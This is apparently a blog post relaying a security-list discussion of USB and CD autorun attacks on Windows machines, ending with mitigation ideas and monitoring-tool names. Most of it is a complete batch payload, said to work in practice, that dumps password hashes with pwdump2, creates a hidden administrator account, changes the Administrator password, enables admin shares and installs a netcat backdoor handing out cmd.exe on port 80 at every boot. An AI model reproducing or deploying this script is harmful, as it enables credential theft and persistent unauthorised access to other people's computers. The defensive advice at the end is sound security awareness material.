For the past week there has been a nice discussion on Security focus on USB attacks . Basically what the hacker does is insert a USB keyring device into a computer. The USB device is loaded with a autorun.inf which points to several batch files or scripts that can

-Add new Users
-Change Admin Rights
-Delete Passwords
-Change Passwords
-Use netcat to leave a backdoor
-use pwdump to grap the sam file
-use basic windows commands to grap system information
-download trojens from a server

The possibilities are quite endless. One person (sorry I forgot who it was) actually posted his scripts that he claims work fine and have worked fine on more than one occasion:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off

:isplaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me )
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
<EOF b.bat>
Another person pointed out another crule idea. Leaving a CD on the ground with something like "Forth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer and an autorun sequence could have their computer for lunch.

Gadi Evron gives some ideas to stop these kind of attacks (one in particular I really like )

Disabling USB all-together, virtually, by domain policy or removing the
USB devices themselves, maybe even just filling the plugs with silicon
or glue physically are some more drastic options which some
organizations *might* take, but I don't see it as a very viable option
for most.

It all depends on your risk analysis. Cost vs. benefit, as always with

There exist several tools to monitor a domain for when and if a USB
device is connected to any remote machine, and of what kind. A simple
web search should help you find some examples.
Basically, just a heads up that this can and does happen very easily so watch out!


Part of the Message:

How to make an Auto Run CD:

USB Storage FAQ:

DeviceLock -
LANDesk System Manager 8 -
OptimAccess WorkSpy -
SecureNT - /index.htm (description only in czech language)